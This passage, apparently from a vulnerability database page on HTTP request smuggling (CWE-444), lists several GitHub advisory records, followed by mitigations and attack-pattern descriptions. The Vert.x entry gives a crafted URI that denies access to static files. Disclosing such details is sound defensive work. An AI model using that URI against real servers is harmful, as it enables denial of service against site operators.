    "CVE-2026-4742"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-24T04:17:30Z",
    "severity": "LOW"
  },
  "details": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027) vulnerability in visualfc liteide (liteidex/src/3rdparty/qjsonrpc/src/http-parser modules). This vulnerability is associated with program files http_parser.C.\n\nThis issue affects liteide: before x38.4.",
  "id": "GHSA-cf47-c3cp-r84w",
  "modified": "2026-03-24T06:31:13Z",
  "published": "2026-03-24T06:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4742"
    },
    {
      "type": "WEB",
      "url": "https://github.com/visualfc/liteide/pull/1325"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:L/U:Green",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-CJPG-RGQ5-FR37

Vulnerability from github – Published: 2026-06-09 06:31 – Updated: 2026-06-09 06:31
VLAI
Details

Spring MVC and WebFlux applications are vulnerable to Multipart request smuggling attacks.

Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-41853"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-09T05:16:37Z",
    "severity": "MODERATE"
  },
  "details": "Spring MVC and WebFlux applications are vulnerable to Multipart request smuggling attacks.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48.",
  "id": "GHSA-cjpg-rgq5-fr37",
  "modified": "2026-06-09T06:31:58Z",
  "published": "2026-06-09T06:31:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41853"
    },
    {
      "type": "WEB",
      "url": "https://spring.io/security/cve-2026-41853"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CPHF-4846-3XX9

Vulnerability from github – Published: 2026-01-15 21:31 – Updated: 2026-01-16 20:20
VLAI
Summary
Vert.x Web static handler component cache can be manipulated to deny the access to static files
Details

The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI.

The issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web): https://github.com/eclipse-vertx/vert.x/pull/5895

Steps to reproduce Given a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example https://example.com/foo/index.html can be denied with https://example.com/foo/bar%2F..%2Findex.html

Mitgation Disabling Static Handler cache fixes the issue.

StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.vertx:vertx-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.vertx:vertx-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0.CR1"
            },
            {
              "fixed": "5.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1002"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-15T22:51:27Z",
    "nvd_published_at": "2026-01-15T21:16:05Z",
    "severity": "MODERATE"
  },
  "details": "The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI.\n\n\nThe issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web):  https://github.com/eclipse-vertx/vert.x/pull/5895 \n\n\n\nSteps to reproduce\nGiven a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example https://example.com/foo/index.html can be denied with https://example.com/foo/bar%2F..%2Findex.html\n\nMitgation\nDisabling Static Handler cache fixes the issue.\n\n\n\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);",
  "id": "GHSA-cphf-4846-3xx9",
  "modified": "2026-01-16T20:20:55Z",
  "published": "2026-01-15T21:31:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vert-x3/vertx-web/issues/2836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eclipse-vertx/vert.x/pull/5894"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eclipse-vertx/vert.x/pull/5895"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eclipse-vertx/vert.x/commit/5b67f5d17788b2483d277c760f3f8154f9b2fed0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eclipse-vertx/vert.x/commit/d007e7b418543eb1567fe95cf20f5450a5c2d047"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/eclipse-vertx/vert.x"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Vert.x Web static handler component cache can be manipulated to deny the access to static files"
}

GHSA-CQ5Q-38RC-VWRJ

Vulnerability from github – Published: 2025-08-29 03:30 – Updated: 2025-08-29 03:30
VLAI
Details

Akamai Ghost before 2025-07-21 allows HTTP Request Smuggling via an OPTIONS request that has an entity body, because there can be a subsequent request within the persistent connection between an Akamai proxy server and an origin server, if the origin server violates certain Internet standards.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-54142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-29T01:15:35Z",
    "severity": "MODERATE"
  },
  "details": "Akamai Ghost before 2025-07-21 allows HTTP Request Smuggling via an OPTIONS request that has an entity body, because there can be a subsequent request within the persistent connection between an Akamai proxy server and an origin server, if the origin server violates certain Internet standards.",
  "id": "GHSA-cq5q-38rc-vwrj",
  "modified": "2025-08-29T03:30:50Z",
  "published": "2025-08-29T03:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54142"
    },
    {
      "type": "WEB",
      "url": "https://community.akamai.com/customers/s/feed/0D5a700000W51m8CAB"
    },
    {
      "type": "WEB",
      "url": "https://www.akamai.com/blog/security-research/advisory-cve-2025-54142-http-request-smuggling-via-options-body"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CQ96-MHX2-84M8

Vulnerability from github – Published: 2022-12-06 18:30 – Updated: 2022-12-08 00:30
VLAI
Details

Multiple instances of improper input validation vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to retrieve files with specific extension from the underlying Linux system via crafted HTTP requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-33876"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-06T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple instances of improper input validation vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to retrieve files with specific extension from the underlying Linux system via crafted HTTP requests.",
  "id": "GHSA-cq96-mhx2-84m8",
  "modified": "2022-12-08T00:30:29Z",
  "published": "2022-12-06T18:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33876"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-22-253"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433].

Mitigation
Implementation

Use only SSL communication.

Mitigation
Implementation

Terminate the client session after each request.

Mitigation
System Configuration

Turn all pages to non-cacheable.

CAPEC-273: HTTP Response Smuggling

An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server).

See CanPrecede relationships for possible consequences.

CAPEC-33: HTTP Request Smuggling

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).

See CanPrecede relationships for possible consequences.